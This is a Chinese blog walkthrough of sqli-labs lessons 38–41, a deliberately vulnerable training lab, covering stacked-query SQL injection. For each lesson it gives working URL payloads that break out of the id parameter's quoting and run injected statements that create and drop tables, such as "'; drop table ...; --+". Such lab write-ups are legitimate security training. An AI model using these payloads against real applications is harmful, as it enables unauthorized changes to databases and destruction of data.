sqli-labs Less38-Less41
Posted zhaihuijie
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs Less38-Less41相关的知识,希望对你有一定的参考价值。
补充知识:堆叠注入
Lesson 38 GET - Stacked Query injection - string
(1)先测试
SELECT * FROM users WHERE id=\'1\' LIMIT 0,1
显示正常,id值被单引号包裹
加上单引号和注释符
?id=1\' --+
(2)构造语句
?id=1\'; create table crow2 like users; --+
执行成功
(3)在mysql命令行中查看
插入成功
(4)删除刚创建的表
?id=1\'; drop table crow2; --+
执行成功
已成功删除
Lesson 38结束
Lesson 39 GET - Stacked Query injection - Intiger based
(1)先测试
SELECT * FROM users WHERE id=1 LIMIT 0,1
显示正常,id值没有被包裹
(2)直接构造语句
?id=1; create table crow like users;--+
执行成功
(3)删除刚创建好的表
?id=1; drop table crow;--+
执行成功
成功删除
Lesson 39结束
Lesson 40 GET - Blind based - string - stacked
(1)先测试
SELECT * FROM users WHERE id=(\'1\') LIMIT 0,1
显示正常,id值被单引号和括号包裹
加上单引号和单括号 注释符
?id=1\') --+
(2)构造语句
?id=1\'); create table crow lie users; --+
创建成功
(3)删除表
?id=1\'); drop table crow; --+
执行成功
删除成功
Lesson 40结束
Lesson 41 GET - Blind based - Intiger - Stacked
(1)先测试
SELECT * FROM users WHERE id=1 LIMIT 0,1
显示正常,id值没有进行包裹
(2)加上单引号
没有任何回显
前几关,加上相应的会进行报错,所以证明这次的是盲注,只有输入正确的时候才会显示。不过不怎么影响接下来的操作。
(3)构造语句
?id=1; create table crow like users;--+
创建成功
(4)删除表
?id=1; drop table crow;--+
删除成功
Lesson 41结束
以上是关于sqli-labs Less38-Less41的主要内容,如果未能解决你的问题,请参考以下文章
sqli-labs less41 GET -Blind based -Intiger -Stacked(GET型基于盲注的堆叠查询整型注入)
sqli-labs less23 Error based - strip comments (基于错误的去除注释的GET型注入)